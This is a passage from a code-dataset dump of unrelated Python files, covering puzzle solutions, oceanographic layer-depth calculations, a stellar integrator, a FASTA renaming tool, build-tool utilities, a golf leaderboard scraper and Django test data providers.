\n\n# Note:\n\n# 1 <= a <= 100\n# 1 <= b <= 100\n# 1 <= c <= 100\n# a != b, b != c, c != a\n\n \ndef sum(a, b, c):\n count = (b-a - 1) + (c-b - 1)\n return count\n\ndef numMove(a, b, c):\n \"\"\"\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n list = [a,b,c]\n list.sort()\n max_num = sum(list[0],list[1],list[2])\n min_num = 0\n print(list)\n if (max_num != 0):\n if (list[2] - list[1] == 2) or (list[2] - list[1] == 1) or (list[1] - list[0] == 1) or (list[1] - list[0] == 2):\n min_num = 1\n else:\n min_num = 2\n\n return [min_num,max_num]\n\nprint(numMoves(1,2,5))\n\nclass Solution(object):\n def numMovesStones(self, a, b, c):\n \"\"\"\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n return numMove(a,b,c)\n\n\n","sub_path":"stone.py","file_name":"stone.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"332479074","text":"\n\nvalidPaths=[\n 'C:\\\\Users\\\\USER_NAME_HERE\\\\Documents', #note, this a default path.\n 'NETWORK_ROOT:\\\\NETWORK_DIRECTORIES',\n]\n\nblackList=[''] #list of strings for filenames you want the metadata for, but \n #not those to archive (i.e. \"tax records\" \"sensitive.doc\")\n\ninvalidPaths=[ #list of known folders with documents I do not want\n 'C:\\\\Users\\\\Administrator\\\\Documents\\\\Exclude',\n ]\n \nexcludeFiles=['thumbs.db'] #files that you don't want to scrape or archive (i.e. useless files, inaccessible files)\n\ndataFormat={ #key for all variables that can go into the database for storage\n 'type': None,\n 'fileName': None,\n 'path': None,\n 'author': None,\n 'createdDate': None,\n 'lastAuthor': None,\n 'lastSaveTime':None ,\n 'scrapeTime':None ,\n 'fileSize':None,\n 'templateFile':None,\n 'revisions':None,\n 'totalEditingTime':None,\n 'archivedLocation':None,\n 'flag':None}\n\nnetworkDataFormat={ #Key for variables used in generating a co-editing network\n 'title':None,\n 'author': None,\n 'createdDate': None,\n 'lastAuthor': None,\n 'lastSaveTime':None ,\n }\n\nmapper={ #Translater for Microsoft parameter names and dataFormat names.\n 'Author':'author',\n 'Creation Date':'createdDate',\n 'Number of Bytes':'fileSize',\n 'Last Author':'lastAuthor',\n 'Last Save Time':'lastSaveTime',\n 'Revision Number':'revisions',\n 'Template':'templateFile',\n 'Total Editing Time':'totalEditingTime',\n 'type':'type',\n 'fileName':'fileName',\n 'path':'path',\n 'author':'author',\n 'createdDate':'createdDate',\n 'lastAuthor':'lastAuthor',\n 'lastSaveTime':'lastSaveTime',\n 'scrapeTime':'scrapeTime',\n 'fileSize':'fileSize',\n 'templateFile':'templateFile',\n 'template':'templateFile',\n 'revisions':'revisions',\n 'totalEditingTime':'totalEditingTime',\n 'archivedLocation':'archivedLocation',\n 'flag':'flag'\n}\n\n\n\n","sub_path":"ScrapeVariables.py","file_name":"ScrapeVariables.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604479283","text":"#BOJ 9461 파도반 수열\n\nT = int(input())\n\nfor i in range(0,T):\n N = int(input())\n dpList = [0 for j in range(0,N+1)]\n\n if 1 <= N <= 3:\n print(1)\n elif N == 4 or N == 5:\n print(2)\n elif N == 6:\n print(3)\n elif N == 7:\n print(4)\n elif N == 8:\n print(5)\n else:\n dpList[1] = dpList[2] = dpList[3] = 1\n dpList[4] = dpList[5] = 2\n dpList[6] = 3\n dpList[7] = 4\n dpList[8] = 5\n for j in range(9, N+1):\n dpList[j] = dpList[j-1] + dpList[j-5]\n print(dpList[N])","sub_path":"Dynamic Programming/BOJ_9461_파도반수열.py","file_name":"BOJ_9461_파도반수열.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"620995050","text":"#coding:utf-8\n\n#from numba import jit,f8,i1\nimport numpy as np\nimport subroutine\nfrom scipy import inf, nan\nimport density\nimport os\nimport time\nimport Climatology_and_InterannualVariation as CI\n\ndef make_ILD(year,month,product_n=3,dt=0.2):\n\tILD, _, _ = make_data(year, month, product_n, dt)\n\treturn ILD\n\ndef make_MLD(year,month,product_n=3,dt=0.2):\n\t_, MLD, _ = make_data(year, month, product_n, dt)\n\treturn MLD\n\ndef make_BLT(year,month,product_n=3,dt=0.2):\n\t_, _, BLT = make_data(year, month, product_n, dt)\n\treturn BLT\n\ndef make_data(year,month,product_n=3,dt=0.2):\n\t# ESTOC、ORAS4などで、層厚の計算を行うための関数。\n\t# MOAA_GPVだけ、格納されているのが(ポテンシャル水温でなく)通常の水温なので、まずポテンシャル水温への変換が必要\n\t_,title_name,_=subroutine.product_n_to_name(product_n)\n\tt=subroutine.get_data(year,month,'t',0,title_name)\n\ts=subroutine.get_data(year,month,'s',0,title_name)\n\tILD, MLD, BLT = make_data_from_ts(t, s, product_n, dt)\n\treturn ILD, MLD, BLT\n\n\ndef make_ILD_from_ts(t, s, product_n = 3, dt = 0.2):\n\tILD, _, _ = make_data_from_ts(t, s, product_n, dt)\n\treturn ILD\n\n\ndef make_MLD_from_ts(t, s, product_n = 3, dt = 0.2):\n\t_, MLD, _ = make_data_from_ts(t, s, product_n, dt)\n\treturn MLD\n\n\ndef make_BLT_from_ts(t, s, product_n = 3, dt = 0.2):\n\t_, _, BLT = make_data_from_ts(t, s, product_n, dt)\n\treturn BLT\n\n\ndef make_data_from_ts(t, s, product_n = 3, dt = 0.2):\n\t_,title_name,_=subroutine.product_n_to_name(product_n)\n\txgrid,ygrid,zgrid=subroutine.product_grid_info('t','data',product_n)\n\n\t# MOAA_GPVだけ、格納されているのが(ポテンシャル水温でなく)通常の水温なので、まずポテンシャル水温への変換が必要\n\tif title_name=='MOAA_GPV':\n\t\ttheta=np.zeros((t.shape[0],t.shape[1],t.shape[2]))\n\t\tfor m in range(0,zgrid.size):\n\t\t\ttheta[:,:,m]=density.poT(t[:,:,m],s[:,:,m],zgrid[m])\n\n\t\tt=theta\n\t\tt[np.where(abs(t)== inf)]=nan\n\n\trho=density.rho(t,s,0)\n\trho[np.where(abs(rho)== inf)]=nan\n\txn=xgrid.size\n\tyn=ygrid.size\n\tILD=np.zeros([yn,xn])\n\tMLD=np.zeros([yn,xn])\n\tBLT=np.zeros([yn,xn])\n\tfor i in range(0,xn):\n\t\tfor j in range(0,yn):\n\t\t\tif np.isnan(t[j,i,0]) == 0:\n\t\t\t\ttpro=t[j,i,:]\n\t\t\t\trhopro=rho[j,i,:]\n\t\t\t\tspro = s[j, i, :]\n\t\t\t\tILD[j, i], MLD[j, i], BLT[j, i] = make_data_from_profile(tpro, spro, rhopro, zgrid, dt)\n\t\t\telse:\n\t\t\t\tILD[j,i]=nan\n\t\t\t\tMLD[j,i]=nan\n\t\t\t\tBLT[j, i] = nan\n\n\n\treturn ILD,MLD,BLT\n\n\ndef make_data_from_profile(tpro, spro, rhopro, zgrid, dt = 0.2):\n\tdrho=density.rho(tpro[0]-dt,spro[0],0)-density.rho(tpro[0],spro[0],0)\n\t# ILD calculating\n\tif np.where(tpro[0]-tpro>dt)[0].size==0:\n\t\t# 全層でsst-dt度より水温が高かった時。\n\t\t# 海底までの深さをILDとする。\n\t\tn1=max(np.where(np.isnan(tpro) == 0)[0])\n\t\tz1=zgrid[n1]\n\t\tILD=round(z1,0)\n\telse:\n\t\tn1=min(np.where(tpro[0]-tpro>dt)[0])-1\n\t\tn2=n1+1\n\t\tz1=zgrid[n1]\n\t\tz2=zgrid[n2]\n\t\tt1=tpro[n1]\n\t\tt2=tpro[n2]\n\t\tD=z2-z1\n\t\tdz=(t1-(tpro[0]-dt))/(t1-t2)*D\n\t\tILD=round(z1+dz,0)\n\t# ILD calculating\n\n\t# MLD calculating\n\tif np.where(rhopro-rhopro[0]>drho)[0].size==0:\n\t\t# 全層でssrho+drhoより密度が低かった時。\n\t\t# 海底までの深さをMLDとする。\n\t\tn1=max(np.where(rhopro!=inf)[0])\n\t\tn1=max(np.where(np.isnan(rhopro) == 0)[0])\n\t\tz1=zgrid[n1]\n\t\tMLD=round(z1,0)\n\telse:\n\t\tn1=min(np.where(rhopro-rhopro[0]>drho)[0])-1\n\t\tn2=n1+1\n\t\tz1=zgrid[n1]\n\t\tz2=zgrid[n2]\n\t\trho1=rhopro[n1]\n\t\trho2=rhopro[n2]\n\t\tD=z2-z1\n\t\tdz=(rho1-(rhopro[0]+drho))/(rho1-rho2)*D\n\t\tMLD=round(z1+dz,0)\n\t# MLD calculating\n\n\tBLT=ILD-MLD\n\tif BLT < 0.0:\n\t\tBLT = 0.0\n\n\treturn ILD, MLD, BLT\n\n\n\ndef cal(d,t,s,dt):\t\t\t\t\t# 水温と塩分それぞれのプロファイル、及びそのデータが得られた水深のデータを入れることによって、層厚を計算することができるプログラム。\n\timport numpy as np\n\timport subroutine\n\timport density\n\ttp=subroutine.interpolate(t,d)\n\tsp=subroutine.interpolate(s,d)\n\trhop=density.rho(tp,sp,0)\n\tdrho=density.rho(tp[0]-dt,sp[0],0)-rhop[0]\n\tILD=tp[np.where(tp>=tp[0]-dt)].size\n\tMLD=rhop[np.where(rhop<=rhop[0]+drho)].size\n\tBLT=ILD-MLD\n\treturn [MLD,ILD,BLT]\n\n\ndef easy_cal(d,t,s,dt):\t\t\t# 線形内挿を使わずに手っ取り早く計算いたします\n\timport numpy as np\n\timport subroutine\n\timport density\n\trho=density.rho(t,s,0)\n\tdrho=density.rho(t[0]-dt,s[0],0)-rho[0]\n\tILD=max(d[np.where(t>=t[0]-dt)])\n\tMLD=max(d[np.where(rho<=rho[0]+drho)])\n\tBLT=ILD-MLD\n\treturn [MLD,ILD,BLT]\n\n\ndef overdraw_argopoint(plt,year,month,var,dt,cb_min,cb_max,my_color,Area_id):\n\t# MLD:var=0,ILD:var=1,BLT:var=2\n\timport subroutine\n\timport numpy as np\n\timport matplotlib.pyplot as plt\n\timport AQC\n\timport Area\n\tAA = Area.Area[Area_id]\n\ttemp,salt,pres,lon,lat=AQC.get_data(year,month)\n\tN_PROF=pres.shape[0]\n\tslat = AA.slat\n\tnlat = AA.nlat\n\twlon = AA.wlon\n\telon = AA.elon\n\tMLD=np.zeros(N_PROF)\n\tILD=np.zeros(N_PROF)\n\tBLT=np.zeros(N_PROF)\n\tfor i in range(0,N_PROF):\n\t\tif lat[i]>=slat and lat[i]<=nlat and lon[i]>=wlon and lon[i]<=elon:\n\t\t\tMLD[i],ILD[i],BLT[i]=easy_cal(pres[i,:],temp[i,:],salt[i,:],dt)\n\t\t\tMLD[i]=to_5m(MLD[i])\n\t\t\tILD[i]=to_5m(ILD[i])\n\t\telse:\n\t\t\tMLD[i],ILD[i],BLT[i]=1000.0,1000.0,1000.0\n\n\tif var==0:\n\t\ttheta=MLD\n\telif var==1:\n\t\ttheta=ILD\n\telif var==2:\n\t\ttheta=BLT\n\telse:\n\t\traise Exception('error! your var is not valid!')\n\n\tinterval_of_cf=np.arange(cb_min,cb_max+5.0,5.0)\n\tcmap=subroutine.get_cmap(my_color)\n\tplt.scatter(lon,lat,c=theta,s=75,vmin=min(interval_of_cf),vmax=max(interval_of_cf),cmap=cmap)\n\treturn plt\n\n\ndef to_5m(D):\t\t\t\t\t# 層厚が5メートル以下と出た時に5メートルにする\n\tif D<=5.0:\n\t\tD=5.01\n\treturn D\n","sub_path":"making_LayerDepth_data.py","file_name":"making_LayerDepth_data.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"469082047","text":"# execute on interactive command line\n# %pylab\nimport sys\nsys.path.append('../mypylib')\nfrom stars import star_utils as su\n\n# print su.grav_const\n# G in units of 'cm^3 g^-1 s^-2'\n# introduce code units:\n# one unit of density: g_cu * cm_cu**-3 = 0.1691355\n# one length unit: 1R_sun = 6.955e+10 cm\n# one unit of mass: 1M_sun = 1.9891e+33 g\n# one unit of time: 1yr = 3.14e7s\nL_cu = su.rsun_cm # length in code unit\ncm_cu = 1./L_cu \nM_cu = su.msun_g\ng_cu = 1./M_cu\nT_cu = 3.14e7\ns_cu = 1/T_cu\nG_cu = su.grav_const * cm_cu**3 * g_cu**-1 * s_cu**-2\n# code unit of G: R_sun^3 Msun^-1 yr^-2\n# one unit of pressure: [cgs: g cm^-1 s^-2] -> Msun Rsun^-1 yr^-2\n\nrho_c = 0.0010887436239364599 # in cgs\nrho_c = rho_c * g_cu * cm_cu**-3 # cu\nP_c = 89386992764.462601 # in cgs\nP_c = P_c * g_cu * cm_cu**-1 * s_cu**-2 # cu\nprint(rho_c, P_c)\n\n# p2.get('radius')[-1],p2.get('mass')[-1]\nr_c = 0.058674868915132176 # in L_cu = R_sun\nm_c = 1.5612859321774683e-07 # in M_cu = M_sun\n\n# EOS:\ngamma_ad = 5./3.\nK_ad = P_c/(rho_c**gamma_ad)\nK = K_ad\nprint(K)\n\ndef rho(p): # polytropic EOS\n return (p/K)**(1./gamma_ad)\n\n# unit tester EOS:\nprint(rho(P_c), rho_c)\n\n# RHS of system of ODEs\ndef f_rhs(y,r):\n dm_dr = 4.*pi*(r**2)*rho(y[1])\n dp_dr = -rho(y[1])*G_cu*y[0]/(r**2)\n return [dm_dr,dp_dr]\n\n\n# initial conditions\nV0 = 4./3*pi*r_c**3\nm_0 = rho_c*V0\nprint(m_0,m_c)\n\ndef int_eul(nsteps,r_c,dr,y0):\n r = r_c\n dr = dr\n y = array(y0)\n pp = []; mp = []; rp = [] \n for i in range(nsteps):\n rhs = f_rhs(y,r)\n y += array(rhs)*dr\n r += dr\n mp.append(y[0])\n pp.append(y[1])\n rp.append(r)\n return mp, pp, rp\n\ny0=[m_0,P_c]\ndr = 0.01\nsteps = 2500\nmass,pressure,radius = int_eul(steps,r_c,dr,y0)\nplot(mass,radius)\n","sub_path":"examples/int_star.py","file_name":"int_star.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"5622262","text":"from turtle import *\r\nquilles=[[0,10],[13,15]]\r\ndef printquilles(quilles):\r\n for i in range (0,quilles[0][0]):\r\n print(\"_\")\r\n for pointeur in range(len(quilles)):\r\n if pointeur>0:\r\n for i in range(quilles[pointeur-1][1],quilles[pointeur][0]):\r\n print(\"_\",end=\"\")\r\n for k in range(quilles[pointeur][0],quilles[pointeur][1]):\r\n print(\"|\",end=\"\")\r\n\r\nwhile len(quilles)>0:\r\n a=textinput(\"Jeu des quilles\",\"Où voulez-vous jouer?\")\r\n nlignejeu=int(a[:a.find(\":\")])\r\n printquilles(quilles)\r\n","sub_path":"quilles/liste de quilles.py","file_name":"liste de quilles.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516963517","text":"#!/usr/bin/env python3\nimport re, sys\n\ndef rename_fasta(infile, outfile, resp, regex=None, split_char=None, group=None, n_groups=None):\n # Build RE\n if resp == 1:\n assert split_char is not None and group is not None and n_groups is not None, \"Something went wrong\"\n grps = [i+1 for i in range(n_groups)]\n re_string = '>{}(.*)$'.format(\"(.*?)[{}]\".format(split_char)*(n_groups-1))\n re_compiled = re.compile(re_string, re.M)\n grps.remove(group)\n else:\n re_compiled = re.compile(regex)\n grps = [1,2]\n grps.remove(group)\n\n # Rename Seqs\n with open(infile, 'r') as f:\n with open(outfile, 'w+') as out:\n for line in f:\n if line.startswith('>'):\n match = re_compiled.match(line)\n new_string = '>{}_{}\\n'.format(match.group(group), \"_\".join([match.group(i) for i in grps]))\n out.write(new_string)\n else:\n out.write(line)\n\ndef rename_dialogue(file_name):\n # User Interaction\n print(\"Reformat FASTA file for use with TreeFix-VP\")\n print(\"-\"*43)\n\n print(\"In order to properly calculate transmission cost, each sequence name must be formatted as 'HOST_UNIQUE-STRAIN-ID'. Select how to find the host name within the current sequence names:\")\n print(\"1. Split on character\\n2. Use regular expression\")\n while True:\n resp = input()\n try:\n resp = int(resp)\n except ValueError:\n print(\"Invalid input, please enter 1 or 2\")\n continue\n if resp == 1 or resp == 2:\n break\n else:\n print(\"Invalid input, please enter 1 or 2\")\n continue\n\n if resp == 1:\n regex = None\n special_chars = ['.', '^', '$', '*', '+', '?', '{', '}', '[', ']']\n while True:\n split_char = input(\"Enter split character: \")\n if len(split_char) > 1:\n print(\"Invalid input, please enter a single character\")\n continue\n if split_char in special_chars:\n split_char = '\\\\{}'.format(split_char)\n break\n while True:\n n_groups = input(\"Number of groups in sequence name: \")\n try:\n n_groups = int(n_groups)\n except ValueError:\n print(\"Invalid input\")\n continue\n break\n while True:\n group = input(\"Host name appears in group number: \")\n try:\n group = int(group)\n except ValueError:\n print(\"Invalid input\")\n continue\n if group > n_groups or group <= 0:\n print(\"Please enter a valid group number\")\n continue\n break\n\n if resp == 2:\n split_char = None\n group = None\n while True:\n regex = input(\"Enter regular expression with groups for host name and unique ID: \")\n try:\n re.compile(regex.strip(), re.M)\n break\n except:\n print(\"Invalid input, please enter a valid regular expression\")\n continue\n while True:\n group = input(\"Host name is group 1 or 2?: \")\n try:\n group = int(group)\n except ValueError:\n print(\"Invalid input\")\n continue\n if group == 1 or group == 2:\n break\n else:\n print(\"Please enter 1 or 2\")\n continue\n n_groups = 2\n\n rename_fasta(file_name, '{}.formatted.seqs'.format(file_name), resp, regex=regex, split_char=split_char, group=group, n_groups=n_groups)\n return \"Done\"\n\ndef short_help():\n print(\"Usage: ./tree_utils [operation] [sequence file path]\")\n print(\"Operations: '{}'\".format(\"', '\".join(ops_dict)))\n sys.exit(1)\n\ndef long_help():\n print(\"Usage: ./tree_utils [operation] [sequence file path]\\n\")\n print(\"rename: formats multiple sequence alignment in FASTA format for use with TreeFix-VP\")\n print(\"help: displays this message\")\n sys.exit(1)\n\ndef main():\n\n try:\n op = sys.argv[1]\n except:\n short_help()\n if op == \"help\":\n long_help()\n try:\n tf = sys.argv[2]\n except:\n short_help()\n\n print(\"Operation = {}\".format(op))\n print(\"Tree File = {}\".format(tf))\n\n print(ops_dict.get(op, lambda x: 'Invalid Operation')(tf))\n\nif __name__ == \"__main__\":\n ops_dict = {\n \"rename\": rename_dialogue,\n \"help\": long_help\n }\n main()\n\n","sub_path":"lib/seq_utils.py","file_name":"seq_utils.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77863597","text":"\"\"\"Utilities for use in tools.\"\"\"\n\nimport logging\nimport os.path\nimport re\nimport sys\nfrom contextlib import contextmanager\n\nfrom menhir.fileutils import load_yaml\nfrom menhir.tool import load_tool\n\nlog = logging.getLogger(__name__)\n\nOK = {\n 'status': 'ok'\n}\n\nFAIL = {\n 'status': 'fail'\n}\n\nNOTHING_TO_DO = {\n 'status': 'nothing_to_do'\n}\n\nNON_WORD_PATTERN = re.compile(r'\\W')\n\n\n@contextmanager\ndef package_script(resource_path, resource_package=\"menhir\"):\n \"\"\"Execute a block of code with the given script from the package.\n\n Yields a file like object that is the script written onto the filesystem.\n \"\"\"\n import tempfile\n import pkg_resources\n import stat\n from os import chmod, remove\n\n script = pkg_resources.resource_string(resource_package, resource_path)\n fname = None\n try:\n with tempfile.NamedTemporaryFile(\"wb\", delete=False) as f:\n fname = f.name\n f.write(script)\n chmod(fname, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)\n yield f\n finally:\n remove(fname)\n\n\n@contextmanager\ndef working_dir(path):\n \"\"\"Execute a block of code within the given working dir.\"\"\"\n import os\n dirname = os.getcwd()\n log.debug('Change working dir from %s to %s', dirname, path)\n try:\n os.chdir(path)\n yield\n finally:\n os.chdir(dirname)\n\n\nENV_TO_REMOVE = [\n 'PWD',\n 'PYENV_DIR',\n 'PYENV_HOOK_PATH',\n 'PYENV_SHELL',\n 'PYENV_VERSION',\n 'PYENV_VIRTUALENV_INIT',\n]\n\n\ndef tool_env():\n \"\"\"Return the default tool environment dict.\"\"\"\n import os\n import os.path\n\n default_pyenv_root = os.path.join(os.getenv(\"HOME\"), \".pyenv\")\n env = {\n \"PYENV_ROOT\": default_pyenv_root,\n }\n\n env.update(os.environ)\n\n for k in ENV_TO_REMOVE:\n env.pop(k, None)\n return env\n\n\ndef call(cmd, *args, **kwargs):\n \"\"\"Call a subprocess, returning a menhir result.\"\"\"\n import subprocess\n res = subprocess.call(cmd, *args, **kwargs)\n if res:\n return FAIL\n return OK\n\n\ndef slugify(s, length=None, replace=NON_WORD_PATTERN):\n s = re.sub(replace, \"_\", s)\n if length:\n s = s[:length]\n return s\n\n\n@contextmanager\ndef run_if(cond, phase_name, path):\n if cond:\n log.info(\n 'Running %(phase)s in %(path)s',\n {'phase': phase_name, 'path': path}\n )\n yield True\n else:\n yield False\n log.info(\n 'Not running %(phase)s in %(path)s',\n {'phase': phase_name, 'path': path}\n )\n\n\ndef call_tool_chain(path, info, remainder):\n result = OK\n while remainder:\n tool_name = remainder.pop(0)\n tool = load_tool(tool_name)\n\n parser = tool.arg_parser(add_help=False, prog=tool_name)\n tool_args, unknown = parser.parse_known_args(\n remainder,\n # namespace=copy(args)\n )\n log.debug('tool_args %s: %s', tool_name, tool_args)\n if unknown:\n log.debug('unknown argument: %s', unknown)\n parser.print_help()\n sys.exit(0 if remainder == ['-h'] else 1)\n\n result = tool.execute_tool(path, info, tool_args)\n\n remainder = getattr(tool_args, 'remainder', None)\n log.debug('remainder after %s: %s', tool_name, remainder)\n\n if result['status'] != 'ok':\n return result\n\n return result\n\n\ndef argv_to_dict(arg_names, arg_values):\n \"\"\"Convert vectors of arg names and arg values to a dict.\n\n returns `None, Fail` if there are too few arguments.\n \"\"\"\n if len(arg_names) > len(arg_values):\n return None\n\n return {k: v for (k, v) in zip(arg_names, arg_values)}\n\n\ndef has_self_or_dependent_changes(changed):\n return (\n changed is None or\n changed.get('self') or\n changed.get('dependents')\n )\n\n\ndef load_menhir_state():\n p = 'menhir-state.yaml'\n if os.path.exists(p):\n return load_yaml(p)\n\n\ndef changed_state(info):\n changed = info.get('changed')\n if changed is None:\n changed = load_menhir_state()\n return changed\n","sub_path":"menhir/tool_utils.py","file_name":"tool_utils.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"615451555","text":"position = list(input())\r\nletters = ['0', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\r\n\r\n\r\ndef possible_turns(cell):\r\n\r\n for i in range(1, 9):\r\n if letters[i] == position[0]:\r\n for Y1 in range(1, 9):\r\n for Y2 in range(1, 9):\r\n x1 = i\r\n x2 = int(cell[1])\r\n y1 = Y1\r\n y2 = Y2\r\n dx = abs(int(x1 - x2))\r\n dy = abs(int(y1 - y2))\r\n if dx == 1 and dy == 2 or dx == 2 and dy == 1:\r\n print(letters[Y1], Y2)\r\n\r\n\r\npossible_turns(position)\r\n","sub_path":"Ruben/lesson_6.py","file_name":"lesson_6.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"354055338","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nimport tensorflow as tf\n\n# Normal Loading\na = tf.Variable(10, name='a')\nb = tf.Variable(21, name='b')\nz = tf.add(a, b)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./my_graph/l2', sess.graph)\n for _ in range(10):\n sess.run(z)\n writer.close()\n\n","sub_path":"Tensorflow_lazyLoading.py","file_name":"Tensorflow_lazyLoading.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635791603","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"http://www.espn.com/golf/leaderboard\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n\nary = []\nname_array = soup.find_all('a', class_ = 'full-name')\nuo_array = soup.find_all('td', class_ = 'relativeScore')\nts_array = soup.find_all('td', class_ = 'totalScore in post')\nlength = len(name_array)\n\nfor i in range(0, length):\n full_name = name_array[i].get_text()\n try:\n under_over = int(uo_array[i].get_text())\n except ValueError:\n under_over = uo_array[i].get_text()\n total_score = int(ts_array[i].get_text())\n ary.append({'playerName': full_name, 'score': total_score, 'overUnder': under_over})\nprint(ary)\n\nfile = open(\"leaderboard_data.json\", \"w\")\noutput = ary\njson.dump(output, file)\nfile.close()\n","sub_path":"src/data/getLeaderboard.py","file_name":"getLeaderboard.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"394147000","text":"#! /usr/bin/env python3\n# coding=utf-8\n\n\"\"\"\n< For Rex Debug >\n\"\"\"\n\nfrom django.shortcuts import render,render_to_response\nfrom django.http import HttpResponse,HttpResponseRedirect,HttpResponseNotFound\nimport json,time,threading,copy,os,re\nfrom pprint import pprint as pp, pformat\n\nfrom AcisDB import log\nfrom AcisDB import vcore\n\nimport logging\nmlogger = logging.getLogger(__name__).info\n\nclass RexExcelProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (show_time_first_from_excel,\n show_time_second_from_excel,\n show_time_third_from_excel,\n show_time_fourth_from_excel)\n\n self_test = {\n \"first\" : show_time_first_from_excel,\n \"second\" : show_time_second_from_excel,\n \"third\" : show_time_third_from_excel,\n \"fourth\" : show_time_fourth_from_excel,\n }\n\n def __init__(self,platform = \"SD55\", test_version = \"first\"):\n\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = RexExcelProvider.self_test[self.test_version](self.platform)\n\n logger_to_excel = logging.getLogger(__name__ + '.from_excel')\n logger_to_excel.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n return self.get_data()\n\nclass RexJiraProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (show_time_first_from_jira,\n show_time_second_from_jira,\n show_time_third_from_jira,\n show_time_fourth_from_jira,\n\n follow_second_excel_update_jira,\n follow_third_excel_update_jira ,\n follow_fourth_excel_update_jira,\n )\n\n self_test = {\n \"first\" : show_time_first_from_jira,\n \"second\" : show_time_second_from_jira,\n \"third\" : show_time_third_from_jira,\n \"fourth\" : show_time_fourth_from_jira,\n\n \"follow01\" : follow_second_excel_update_jira,\n \"follow02\" : follow_third_excel_update_jira ,\n \"follow03\" : follow_fourth_excel_update_jira,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = RexJiraProvider.self_test[self.test_version](self.platform)\n\n logger_to_jira = logging.getLogger(__name__ + '.from_jira')\n logger_to_jira.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n return self.get_data()\n\nclass ExcelProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n test_get_excel_data_first,\n test_get_excel_data_second,\n test_get_excel_data_third,\n test_get_excel_data_fourth,\n )\n\n self_test = {\n \"first\" : test_get_excel_data_first,\n \"second\" : test_get_excel_data_second,\n \"third\" : test_get_excel_data_third,\n \"fourth\" : test_get_excel_data_fourth,\n }\n\n def __init__(self,platform = \"SD55\", test_version = \"first\"):\n\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = ExcelProvider.self_test[self.test_version](self.platform)\n\n logger_to_excel = logging.getLogger(__name__ + '.from_excel')\n logger_to_excel.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For Excel Data:\n >>> [\n >>> ...\n >>> {\n >>> \"PLATFORM\" : \"\",\n >>> \"ERD_ID\" : \"\",\n >>> \"excel\" : {\n >>> 'erd_id' : \"\",\n >>> 'category' : \"\",\n >>> 'title' : \"\",\n >>> 'description' : \"\",\n >>> 'product_priority' : \"\",\n >>> 'author' : \"\",\n >>> 'version' : \"\",\n >>> 'platform' : \"\",\n >>> }\n >>> ...\n >>> ]\n \"\"\"\n return self.get_data()\n\nclass JiraProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n test_get_jira_data_first,\n test_get_jira_data_second,\n test_get_jira_data_third,\n )\n\n self_test = {\n \"first\" : test_get_jira_data_first,\n \"second\" : test_get_jira_data_second,\n \"third\" : test_get_jira_data_third,\n }\n\n def __init__(self, platform, test_version):\n self.platform = platform\n self.test_version = test_version\n\n def get_data(self):\n t = JiraProvider.self_test[self.test_version](self.platform)\n\n logger_to_jira = logging.getLogger(__name__ + '.from_jira')\n logger_to_jira.info(pformat(t))\n\n return t\n\n @property\n def formatted_rawdata(self):\n \"\"\"\n For JIRA Ticket Data:\n >>> [\n >>> ...\n >>> {\n >>> \"PLATFORM\" : \"\",\n >>> \"ERD_ID\" : \"\",\n >>> \"jira\" : {\n >>> 'HLD' : \"\",\n >>> 'status' : \"\",\n >>> 'l1_jira' : \"\",\n >>> 'l2_jira' : \"\",\n >>> 'bug_jiras' : \"\",\n >>> 'platform' : \"\",\n >>> 'workload' : \"\",\n\n >>> 'F_casetree' : [\n >>> ...\n >>> {\n >>> 'case_name' : \"\",\n >>> 'case_age' : \"\",\n >>> 'F_report_path': \"\",\n >>> },\n >>> ... ]\n >>> }\n >>> ...\n >>> ]\n \"\"\"\n return self.get_data()\n\nclass JenkinsProvider(vcore.Provider):\n\n from .test_cookies_of_rex import (\n show_time_jenkins_test_01,\n show_time_jenkins_test_02,\n show_time_jenkins_test_03,\n show_time_jenkins_test_04,\n show_time_jenkins_test_05,\n show_time_jenkins_test_06,\n show_time_jenkins_test_07,\n 